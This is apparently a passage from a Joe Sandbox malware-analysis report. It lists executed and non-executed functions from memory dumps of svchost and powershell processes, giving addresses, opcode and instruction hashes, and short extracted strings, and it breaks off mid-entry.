                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4305bb56e89997d07490d767dc41dbc28b9d0771aeed705f02cae3c1266859c
                                                      • Instruction ID: 057633b42be4b5a8dd8177cd058c677c3b237f2c5fb45dd1b24189e9254e7517
                                                      • Opcode Fuzzy Hash: f4305bb56e89997d07490d767dc41dbc28b9d0771aeed705f02cae3c1266859c
                                                      • Instruction Fuzzy Hash: 700149B5A0DBC50FE785BF3899654357FE0DF91240B1804FAE8C8CA1D7DC195A818342
                                                      Function 00007FFB4AD1160B Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1713735926.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90f91038b6b7f418d6be664dcf98ad97dde5abfc9d03fa1fb755579f6f657ab5
                                                      • Instruction ID: 1c52ffb7c76b57894b15069aa875c9ef68e7f2e43536f25a258b98e9faea88c1
                                                      • Opcode Fuzzy Hash: 90f91038b6b7f418d6be664dcf98ad97dde5abfc9d03fa1fb755579f6f657ab5
                                                      • Instruction Fuzzy Hash: BDF059B3B1CD4E0BE780BEB8C8141FD7BA2FBC8340F8404B8E018E21C2DD2819044380

                                                      Executed Functions

                                                      Function 00007FFB4AE14010 Relevance: 1.9, Strings: 1, Instructions: 684COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (7bM
                                                      • API String ID: 0-977313744
                                                      • Opcode ID: a33ff345e545ab6ddbd3ceb8e536c9e872542a34ea219c3d531f4b123f54e319
                                                      • Instruction ID: 60c1bba2b6b8e1420bd835de8c23c23c257501c50201c0f69f4dc8a8dad1e5b4
                                                      • Opcode Fuzzy Hash: a33ff345e545ab6ddbd3ceb8e536c9e872542a34ea219c3d531f4b123f54e319
                                                      • Instruction Fuzzy Hash: 881205F2A4D79A0FE356BF3898651B43FE5EF56210B2901FBD099C7293D9189C068392
                                                      Function 00007FFB4AE16605 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: X7bM
                                                      • API String ID: 0-1367293772
                                                      • Opcode ID: 74e8f6ff45fcccfc2154bd14022809c2bca91b651866abc515c0b760679860f8
                                                      • Instruction ID: ac19d9160530d29a7c764bd193f82ac08672ddf3ebd4136b9176c99f81e2f1f8
                                                      • Opcode Fuzzy Hash: 74e8f6ff45fcccfc2154bd14022809c2bca91b651866abc515c0b760679860f8
                                                      • Instruction Fuzzy Hash: 20D113B290EB998FE766BF7888651B57FE5FF15210B2800FAD49CCB093DA189C06C351
                                                      Function 00007FFB4AD49EF3 Relevance: .3, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97fbfb2bb857eaac080f96d95878654fa666e04d8030447e2dc7ffa33189eba1
                                                      • Instruction ID: b92ca53cb47eaf70b04c54a8b041f8f08ae24e4697c0efdab52cb6db217706ad
                                                      • Opcode Fuzzy Hash: 97fbfb2bb857eaac080f96d95878654fa666e04d8030447e2dc7ffa33189eba1
                                                      • Instruction Fuzzy Hash: B6712CF3D0DAA65FE742BF7CD8A60D47F68FF51228B4842F2C8C89E097EC15191646A1
                                                      Function 00007FFB4AC2E383 Relevance: .1, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1788777954.00007FFB4AC2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC2D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ac2d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f9fc0b07dcdb88fca0d9e931e19cb044b4ca53b176690944c5cb14b93ceef76
                                                      • Instruction ID: 4470f420af7a8255c40247a9899ea8d578466b7e2164c2f7f09a15df2fedee24
                                                      • Opcode Fuzzy Hash: 7f9fc0b07dcdb88fca0d9e931e19cb044b4ca53b176690944c5cb14b93ceef76
                                                      • Instruction Fuzzy Hash: 164112B180DB848FE796DF3CDC559523FA4EF56325B2901EFD088CB1A3D625A806C792
                                                      Function 00007FFB4AD49768 Relevance: .1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a58fbdf445a431d21341481399db8a62cdc706cae2942fa1d5e7ab7ba51ec030
                                                      • Instruction ID: f032ac775bc8841fcaaed9d9b244cda25ece0d095a657ec530ecdb55da0c256e
                                                      • Opcode Fuzzy Hash: a58fbdf445a431d21341481399db8a62cdc706cae2942fa1d5e7ab7ba51ec030
                                                      • Instruction Fuzzy Hash: 8831087191CB4C9FDB18DF5CD8066A97BE4FBA9310F00426FE449D3251DA30A856CBC2
                                                      Function 00007FFB4AD4A47C Relevance: .1, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19264dd6e826779fa2932795c1c83f4b6239f13c0d1e3e20bac2255d82df8c11
                                                      • Instruction ID: 093b3169de6b10434ddc85e3289ba34a5334aa8ea03913dafdaba2844823c8e6
                                                      • Opcode Fuzzy Hash: 19264dd6e826779fa2932795c1c83f4b6239f13c0d1e3e20bac2255d82df8c11
                                                      • Instruction Fuzzy Hash: 41214B7190C74C4FDB19DFACD84A7E97FE4EB96320F04426BD048C3152DA74A41ACB91
                                                      Function 00007FFB4AE143BC Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5488cc0c886ddeb2a0fc8bcb07968b08d69bbd8074fddc849bdcaf2364d346d5
                                                      • Instruction ID: 45bb1a7fa4da467493eab32ecf03acb10207e681cad4547433748e4b6193dd57
                                                      • Opcode Fuzzy Hash: 5488cc0c886ddeb2a0fc8bcb07968b08d69bbd8074fddc849bdcaf2364d346d5
                                                      • Instruction Fuzzy Hash: 681120F2A5E66A4FE3A8FE38D4944B83AD4FF4022076800F6E06DC7292D918AC008391
                                                      Function 00007FFB4AD433B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                      • Instruction ID: 48fcc02f775cddf632b69523a5b402d5c4ac8cef37633788f9de53dd99f768bb
                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                      • Instruction Fuzzy Hash: 3C01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DA36E892CB45
                                                      Function 00007FFB4AE14149 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789980826.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ae10000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33a3be56952c984f818ef57dc656c143b0d966c9bf84e9a225dd23aa7b630536
                                                      • Instruction ID: 01b194689d7e6475fcef19cf33453f9ef62827f76c55ecdf2c51667a3b91b84d
                                                      • Opcode Fuzzy Hash: 33a3be56952c984f818ef57dc656c143b0d966c9bf84e9a225dd23aa7b630536
                                                      • Instruction Fuzzy Hash: 18F0C2B2A8C5858FD355FF6CE4004B47BE4FF5532072900FAD05DC7153CA26AC858740

                                                      Non-executed Functions

                                                      Function 00007FFB4AD48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1789399629.00007FFB4AD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ffb4ad40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_^4$K_^7$K_^F$K_^J
                                                      • API String ID: 0-377281160
                                                      • Opcode ID: 2bd6d2f2dd05163922811fc3a4b7816dac4a558a94fc340b39088219714e54f0
                                                      • Instruction ID: d8ec5813aa89af2d1eae24653abc4e8cf4a2f7f3aae59695bc8ddf21f33f48bc
                                                      • Opcode Fuzzy Hash: 2bd6d2f2dd05163922811fc3a4b7816dac4a558a94fc340b39088219714e54f0
                                                      • Instruction Fuzzy Hash: E62143B7609226EED7423F7CF8045E93BA8CF9827434582F3D499DB003E814B5878AE0

                                                      Executed Functions

                                                      Function 00007FFB4AE06605 Relevance: .4, Instructions: 449COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4701a02999c9a8aa3e9d1e113f9e815928f98c4f2197b1e67cf30df4131ec0c8
                                                      • Instruction ID: 3fb4bf6021002110363f557561d78c558864b2347af389f3357b76e14d76d35a
                                                      • Opcode Fuzzy Hash: 4701a02999c9a8aa3e9d1e113f9e815928f98c4f2197b1e67cf30df4131ec0c8
                                                      • Instruction Fuzzy Hash: F9D168B290DB998FE755BF7888552B67FE5FF15210B2800FED49CEB083DA589805C351
                                                      Function 00007FFB4AE042FC Relevance: .4, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8586e3f8d1df0475f0748380af0a61aa3dbe53db4ece670f73d1990265e64886
                                                      • Instruction ID: 73231ac224de94ad0e3c5e8f5d223ffa44f98dd66c7ecad7a4ca9638287844d2
                                                      • Opcode Fuzzy Hash: 8586e3f8d1df0475f0748380af0a61aa3dbe53db4ece670f73d1990265e64886
                                                      • Instruction Fuzzy Hash: 5FC127A294E7D50FE356BF3889651A47FE4EF56220B2901FBD099DB0D3D918AC0AC352
                                                      Function 00007FFB4AE03FF8 Relevance: .4, Instructions: 385COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af29ab3d69dff47e91c71db4af272a18edce205edee867dd375effed54d663d0
                                                      • Instruction ID: 55a12010f7d5ede4bcd52c2dbbdac1027fe4417f18e08c9cac6fb77996c08842
                                                      • Opcode Fuzzy Hash: af29ab3d69dff47e91c71db4af272a18edce205edee867dd375effed54d663d0
                                                      • Instruction Fuzzy Hash: C6B126A2A4DB964FE356BE3C8A251743FD5FF56210B2801FBD09DD7193DD18AC068392
                                                      Function 00007FFB4AD39750 Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e34710c2be105d2bc41287f13a4e1268eb7ec178f70aa2d07e814e305f5cdbb7
                                                      • Instruction ID: d665c3bb66c8ca39e833a3f5ea283d3c24164ad6299c96e6157d6d533fff4186
                                                      • Opcode Fuzzy Hash: e34710c2be105d2bc41287f13a4e1268eb7ec178f70aa2d07e814e305f5cdbb7
                                                      • Instruction Fuzzy Hash: 6341067190CB884FDB09EF6C9C1A6B97FE1FB55310F0441AFE48993292CA64AC55CBC6
                                                      Function 00007FFB4AC1EAA8 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1925552526.00007FFB4AC1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC1D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ac1d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 238dafa02c68837961a44da682d89057b0f3af52d2b540f2f7242c9c08eb96b1
                                                      • Instruction ID: d67ab7878da638c1bf014813b91b59f3583b282a296543aa9b1a48700fa54bae
                                                      • Opcode Fuzzy Hash: 238dafa02c68837961a44da682d89057b0f3af52d2b540f2f7242c9c08eb96b1
                                                      • Instruction Fuzzy Hash: C141E57150DBC48FD796DF389C559623FF0EF52220B1502DFD089CB5A3DA24A846CBA2
                                                      Function 00007FFB4AD3A49C Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b97d55948ba1e7b50f25fe8bd301189ef6094a8c2f2a03ee15ef70d1c617f6b5
                                                      • Instruction ID: 00269513eea3efa76321a47259694d5619e46065fc4888b9e3a5ccdffe642434
                                                      • Opcode Fuzzy Hash: b97d55948ba1e7b50f25fe8bd301189ef6094a8c2f2a03ee15ef70d1c617f6b5
                                                      • Instruction Fuzzy Hash: 8621397190C74C4FDB59EF6CD84A7E97FE0EB96320F0441ABD448C3152D674A816CB91
                                                      Function 00007FFB4AE040BF Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6210112a0e9b8d93647775d58b30a443dfda4924357ac37a18879c8537521581
                                                      • Instruction ID: de4d7551fb8b7cb7adf0c4f1f675edb421a87a7d818b4333a24ff3f52adf7338
                                                      • Opcode Fuzzy Hash: 6210112a0e9b8d93647775d58b30a443dfda4924357ac37a18879c8537521581
                                                      • Instruction Fuzzy Hash: 0A21F2A2A8DA674FE7A9FE28C75157466C6FF60310B7800F9D46EE7193CE24EC058241
                                                      Function 00007FFB4AE043BC Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6236964df6430785f4d1d1593387c07bd2b8213ce8c154bbeea212f684b65b34
                                                      • Instruction ID: b349251ff2f79087ce104bf837637714890672ae66e220d36f8bdf69a5baa549
                                                      • Opcode Fuzzy Hash: 6236964df6430785f4d1d1593387c07bd2b8213ce8c154bbeea212f684b65b34
                                                      • Instruction Fuzzy Hash: 171121B2A5E5294FE2A8FF28D6909B876D5FF40320B6810F9E06ED3197CA18AC008340
                                                      Function 00007FFB4AD333B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction ID: b764d3461e64808fe044017503b5428d6c6fdd3860c4a6f5c4fe6a938b6e806c
                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction Fuzzy Hash: 9F01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DA36E892CB45
                                                      Function 00007FFB4AD3A0FB Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fdbfad564c61e8e9c8d59dcfea6bafa120e371f25e4c56bc7fbbc81deb1d47c5
                                                      • Instruction ID: d1bac676dc2a7ba9595695f996f9c04a035f6a2174e6f69928c8d5e733f1cd89
                                                      • Opcode Fuzzy Hash: fdbfad564c61e8e9c8d59dcfea6bafa120e371f25e4c56bc7fbbc81deb1d47c5
                                                      • Instruction Fuzzy Hash: 31F0F6B7A0DA8C4FD745EF3CD8690E47FA0FF66201B5401EBD548C7161D6625808C7C2

                                                      Non-executed Functions

                                                      Function 00007FFB4AD38BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                      • API String ID: 0-1415242001
                                                      • Opcode ID: b69e094581e222027f6376c6dde514a9bfe56ea2a0bcf9ad664e21dd0aba42ff
                                                      • Instruction ID: 177a9161b04b5c7b2c7a803da4e78c874df67be33f06441486a5689b2eaf49fe
                                                      • Opcode Fuzzy Hash: b69e094581e222027f6376c6dde514a9bfe56ea2a0bcf9ad664e21dd0aba42ff
                                                      • Instruction Fuzzy Hash: D82107B36046159AC2023A7DF8415ED7784DF5437834591F3EA18DF113DF24A89B8AA0

                                                      Executed Functions

                                                      Function 00007FFB4AD31719 Relevance: .7, Instructions: 695COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6676647c8494ee772a4fff75301386938fe7f035030fbc2fd63fd5415f89290
                                                      • Instruction ID: bee5c1b784ddf15c93aa287e4aba1b91ed5f0dc868abc8cc5c7af324f378b99e
                                                      • Opcode Fuzzy Hash: d6676647c8494ee772a4fff75301386938fe7f035030fbc2fd63fd5415f89290
                                                      • Instruction Fuzzy Hash: 5B22F6A1B1DA4A5FEB95FF38C4692B977D6EF88300F5405F9E40EC3286DE28AC418741
                                                      Function 00007FFB4AD320F1 Relevance: .2, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 596c1b5bfc51de1366055785c33473040c66c3ad2bd603a93565e94e6b4c7df1
                                                      • Instruction ID: 121086224c062c4d1c1562032efc5d3759b30ff47c9e5ec1e7969b1fcfd44110
                                                      • Opcode Fuzzy Hash: 596c1b5bfc51de1366055785c33473040c66c3ad2bd603a93565e94e6b4c7df1
                                                      • Instruction Fuzzy Hash: 37510E90B1E6C90FD387BF789865276BFE8DF97219B1801FAE089CA193DD085846C346
                                                      Function 00007FFB4AD30AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9M_^
                                                      • API String ID: 0-1708477388
                                                      • Opcode ID: 8d89ebd6c8c5f7bec434c5b625eb49ab0cc9ebbf0578e89dfb5d2e43c7ee3df0
                                                      • Instruction ID: 1bac0a1038ff6bbd1d442919f373e023e2204c5e593db1900044d0717051643e
                                                      • Opcode Fuzzy Hash: 8d89ebd6c8c5f7bec434c5b625eb49ab0cc9ebbf0578e89dfb5d2e43c7ee3df0
                                                      • Instruction Fuzzy Hash: FF6138A6B0E61EDAE742BF7CE4051EC77A5EF84325B1482F6D80DD7187CD24684687A0
                                                      Function 00007FFB4AD30E8E Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4M_^
                                                      • API String ID: 0-2545914641
                                                      • Opcode ID: 22c04f27f4d1498cf18a42ff9cfe3589d3a26d7edc57d40548e3cfa3cdd4f23d
                                                      • Instruction ID: b280ca4c0bd0abb16eadfda45b9f26fde28c87ee5b28d4075adc69de88d0fcc5
                                                      • Opcode Fuzzy Hash: 22c04f27f4d1498cf18a42ff9cfe3589d3a26d7edc57d40548e3cfa3cdd4f23d
                                                      • Instruction Fuzzy Hash: 40510561B0EA864FE397BB78D8551B97FE6DF86220B0941FBD489C7193DC1C9C428362
                                                      Function 00007FFB4AD31295 Relevance: .9, Instructions: 862COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63e59481fc7bc0e800abae21588175506e0d74dfd33a636d1e38a4527f2ccd08
                                                      • Instruction ID: 6cf5749eff32f266934f484409b3722b01d094cb94dd410243d7263ace49db4b
                                                      • Opcode Fuzzy Hash: 63e59481fc7bc0e800abae21588175506e0d74dfd33a636d1e38a4527f2ccd08
                                                      • Instruction Fuzzy Hash: 5421FB67E0E79B8FE741BFBCD8620E97B74EF86220B0842F7D485DA193DD1858068350
                                                      Function 00007FFB4AD30985 Relevance: .3, Instructions: 346COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd2074eedcc943249f9863af86ab213817770b58723c8e67e3e879fbef3804a5
                                                      • Instruction ID: b0ec3044815eecbdabe87cb3b39e35abfed07debe326139c94c295ca36029bdc
                                                      • Opcode Fuzzy Hash: bd2074eedcc943249f9863af86ab213817770b58723c8e67e3e879fbef3804a5
                                                      • Instruction Fuzzy Hash: B6A13566B0A66ADAD701BF7CF8451EC7BA4EF85321B1482F7C849CA183CD246487C7E0
                                                      Function 00007FFB4AD309D3 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3548f1c88fd3b970e9d44526b5591ea5ca8e129a56523bf434490c7b3d837437
                                                      • Instruction ID: a375dad812d4104ca352c413363314671ec146ca8b109898f25a0223696f6375
                                                      • Opcode Fuzzy Hash: 3548f1c88fd3b970e9d44526b5591ea5ca8e129a56523bf434490c7b3d837437
                                                      • Instruction Fuzzy Hash: F3912266B0AA2EDAD701BF7CF8051E97BA4EF85335B1482F7D449CA187CD24648787E0
                                                      Function 00007FFB4AD30A08 Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a377fb05b968ae31067c65060e1f0293e40fa90b3040b2e75a01dea07a9489e8
